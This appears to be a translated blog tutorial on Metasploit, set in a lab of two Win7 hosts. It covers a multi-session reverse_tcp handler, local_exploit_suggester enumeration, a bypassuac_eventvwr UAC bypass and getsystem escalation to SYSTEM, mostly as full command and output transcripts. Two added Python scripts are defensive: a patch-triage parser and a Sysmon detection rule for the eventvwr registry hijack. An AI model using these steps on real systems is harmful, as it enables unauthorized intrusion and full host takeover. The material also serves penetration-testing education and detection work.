A question has bothered me for a long time recently: can msf control multiple servers at once, and how do you perform privilege escalation through msf?
Here I simply started two Win7 SP1 x64 hosts and obtained shells by running a backdoor on them; the steps for generating the shell are skipped.
Obtaining the server shells
First, start msf in Kali and call exploit/multi/handler:
msf5 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.142.19
lhost => 192.168.142.19
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.142.19:4444
msf5 exploit(multi/handler) > [*] Sending stage (176195 bytes) to 192.168.142.24
[*] Meterpreter session 1 opened (192.168.142.19:4444 -> 192.168.142.24:52612) at 2020-10-30 10:15:32 +0800
msf5 exploit(multi/handler) >
[*] Sending stage (176195 bytes) to 192.168.142.101
[*] Meterpreter session 2 opened (192.168.142.19:4444 -> 192.168.142.101:49230) at 2020-10-30 10:15:50 +0800
msf5 exploit(multi/handler) > sessions
Active sessions
===============
  Id  Name  Type                     Information          Connection
  --  ----  ----                     -----------          ----------
  1         meterpreter x86/windows  WY-PC\WY @ WY-PC     192.168.142.19:4444 -> 192.168.142.24:52612 (192.168.200.128)
  2         meterpreter x86/windows  W-Y-PC\W-Y @ W-Y-PC  192.168.142.19:4444 -> 192.168.142.101:49230 (192.168.142.101)
msf5 exploit(multi/handler) >
Two settings here deserve particular attention:
set exitonsession false: keeps the listening port open after a session is established, so the handler can accept multiple sessions.
exploit -j: runs the handler as a background job.
Windows privilege escalation:
Once inside meterpreter, you can try the getsystem command for a simple privilege escalation:
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
But the probability of this escalation succeeding is low, so here we can use the post/multi/recon/local_exploit_suggester module to check which local escalation modules apply:
msf5 exploit(multi/handler) > search suggester
Matching Modules
================
   #  Name                                     Disclosure Date  Rank    Check  Description
   -  ----                                     ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                  normal  No     Multi Recon Local Exploit Suggester
msf5 exploit(multi/handler) > use 0
msf5 post(multi/recon/local_exploit_suggester) > set session 1    // specify the host (session) to check
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run
[*] 192.168.200.128 - Collecting local exploits for x86/windows...
[*] 192.168.200.128 - 34 exploit checks are being tried...
[+] 192.168.200.128 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 192.168.200.128 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 192.168.200.128 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
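From a defender's point of view, the suggester output above is essentially a list of missing patches and misconfigurations for that host. The following script, an added example that is not part of the original post, parses output in the suggester's line format (a constructed sample is embedded; the module names are real Metasploit modules) and turns it into a per-host triage report: modules named after an MS bulletin become patch identifiers, bypassuac modules are grouped as UAC-hardening findings, and everything else is listed under its module name. The category names and the `Finding` class are my own.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample in the format local_exploit_suggester prints (not copied from the post).
SAMPLE_OUTPUT = """\
[*] 192.168.200.128 - Collecting local exploits for x86/windows...
[*] 192.168.200.128 - 34 exploit checks are being tried...
[+] 192.168.200.128 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 192.168.200.128 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[-] 192.168.200.128 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target is not exploitable.
[*] Post module execution completed
"""

# "[+] <host> - <module>: <detail>"; progress lines and gem warnings do not match.
LINE_RE = re.compile(r"^\[([+\-*])\]\s+(\S+)\s+-\s+(exploit/\S+?):\s+(.*)$")
# Module names such as ms10_092_schelevator carry the bulletin number.
MS_RE = re.compile(r"ms(\d{2})_(\d{3})")


@dataclass
class Finding:
    host: str
    module: str
    vulnerable: bool
    detail: str

    @property
    def bulletin(self) -> Optional[str]:
        m = MS_RE.search(self.module)
        return f"MS{m.group(1)}-{m.group(2)}" if m else None

    @property
    def category(self) -> str:
        # Hypothetical triage buckets: what a patch/hardening ticket would be filed under.
        if "bypassuac" in self.module:
            return "uac_bypass"
        if self.bulletin:
            return "missing_patch"
        return "other_local"


def parse_suggester(text: str) -> List[Finding]:
    """Extract one Finding per exploit-check line; ignore everything else."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        tag, host, module, detail = m.groups()
        findings.append(Finding(host, module, tag == "+", detail))
    return findings


def triage(findings: List[Finding]) -> Dict[str, Dict[str, List[str]]]:
    """Group confirmed-vulnerable checks per host by remediation category."""
    report: Dict[str, Dict[str, List[str]]] = defaultdict(
        lambda: {"missing_patch": [], "uac_bypass": [], "other_local": []}
    )
    for f in findings:
        if f.vulnerable:
            report[f.host][f.category].append(f.bulletin or f.module)
    return dict(report)


if __name__ == "__main__":
    for host, buckets in triage(parse_suggester(SAMPLE_OUTPUT)).items():
        print(host)
        for cat, items in buckets.items():
            print(f"  {cat}: {', '.join(items) or '-'}")
```

Checks that the suggester reports as not exploitable are kept in the parsed list but excluded from the report, so the same parser can also be used to confirm that a patch actually closed a finding on a re-run.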
As you can see, the usable modules have been enumerated; here we just select one of them and invoke it directly:
msf5 > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/bypassuac_eventvwr) > show options
Module options (exploit/windows/local/bypassuac_eventvwr):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.142.19   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port
Exploit target:
   Id  Name
   --  ----
   0   Windows x86
msf5 exploit(windows/local/bypassuac_eventvwr) > set session 1
session => 1
msf5 exploit(windows/local/bypassuac_eventvwr) > run
[-] Handler failed to bind to 192.168.142.19:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (176195 bytes) to 192.168.142.24
[*] Meterpreter session 3 opened (192.168.142.19:4444 -> 192.168.142.24:52764) at 2020-10-30 10:30:41 +0800
[*] Cleaning up registry keys ...
[*] Exploit completed, but no session was created.
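The module output above shows the two things a defender can look for: it writes registry keys, then launches eventvwr.exe, which starts the payload with an elevated token. This added example (my own code, not from the post or from Metasploit) runs a small detection over constructed Sysmon-style events: a registry set on the user's mscfile shell\open\command handler (the well-documented key this bypass abuses) raises a medium alert, and any child of eventvwr.exe other than mmc.exe raises an alert that is escalated to high when the child matches the command just written by that user. The event field names follow Sysmon's naming; the sample events and the paths in them are constructed.

```python
from dataclasses import dataclass
from typing import Dict, List

# Hijack point used by the eventvwr UAC bypass: per-user handler consulted before HKCR.
MSCFILE_KEY = r"\software\classes\mscfile\shell\open\command"

# Constructed sample events in Sysmon field naming (EventID 13 = registry value set,
# EventID 1 = process create). Paths and SIDs are made up for the example.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 13, "User": "WY-PC\\WY",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Classes\mscfile\shell\open\command\(Default)",
     "Details": r"C:\Users\WY\AppData\Local\Temp\stager.exe"},
    {"EventID": 1, "User": "WY-PC\\WY", "Image": r"C:\Windows\SysWOW64\eventvwr.exe",
     "ParentImage": r"C:\Windows\SysWOW64\cmd.exe", "IntegrityLevel": "Medium"},
    {"EventID": 1, "User": "WY-PC\\WY", "Image": r"C:\Users\WY\AppData\Local\Temp\stager.exe",
     "ParentImage": r"C:\Windows\SysWOW64\eventvwr.exe", "IntegrityLevel": "High"},
    # Benign: an administrator opening Event Viewer, which hosts itself in mmc.exe.
    {"EventID": 1, "User": "WY-PC\\Admin", "Image": r"C:\Windows\System32\mmc.exe",
     "ParentImage": r"C:\Windows\System32\eventvwr.exe", "IntegrityLevel": "High"},
]


@dataclass
class Alert:
    severity: str
    rule: str
    user: str
    evidence: str


def detect_eventvwr_bypass(events: List[Dict]) -> List[Alert]:
    """Flag mscfile handler hijacks and unexpected children of eventvwr.exe."""
    alerts: List[Alert] = []
    hijacked: Dict[str, str] = {}  # user -> command most recently written into the handler
    for e in events:
        user = e.get("User", "")
        if e["EventID"] == 13 and MSCFILE_KEY in e.get("TargetObject", "").lower():
            hijacked[user] = e.get("Details", "").lower()
            alerts.append(Alert("medium", "mscfile_handler_modified", user, e.get("Details", "")))
        elif e["EventID"] == 1 and e.get("ParentImage", "").lower().endswith("\\eventvwr.exe"):
            child = e.get("Image", "")
            if child.lower().endswith("\\mmc.exe"):
                continue  # normal behaviour of Event Viewer
            # Correlate: the child is exactly what this user planted in the handler key.
            severity = "high" if child and child.lower() in hijacked.get(user, "") else "medium"
            evidence = f"{child} ({e.get('IntegrityLevel', '?')} integrity)"
            alerts.append(Alert(severity, "eventvwr_unexpected_child", user, evidence))
    return alerts


if __name__ == "__main__":
    for a in detect_eventvwr_bypass(SAMPLE_EVENTS):
        print(f"[{a.severity}] {a.rule} user={a.user} {a.evidence}")
```

Because the module cleans up the registry keys a few seconds later ("Cleaning up registry keys ..." in the output), a periodic scan of the key will usually miss it; the value must be caught at write time, which is why the rule keys on the registry-set event rather than on the key's current contents.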
msf5 exploit(windows/local/bypassuac_eventvwr) > sessions -i
Active sessions
===============
  Id  Name  Type                     Information          Connection
  --  ----  ----                     -----------          ----------
  1         meterpreter x86/windows  WY-PC\WY @ WY-PC     192.168.142.19:4444 -> 192.168.142.24:52612 (192.168.200.128)
  2         meterpreter x86/windows  W-Y-PC\W-Y @ W-Y-PC  192.168.142.19:4444 -> 192.168.142.101:49230 (192.168.142.101)
  3         meterpreter x86/windows  WY-PC\WY @ WY-PC     192.168.142.19:4444 -> 192.168.142.24:52764 (192.168.200.128)
msf5 exploit(windows/local/bypassuac_eventvwr) > sessions 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: WY-PC\WY
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Copyright notice: this is an original article by qq_40549070, licensed under CC 4.0 BY-SA; when reposting, please include a link to the original source and this notice.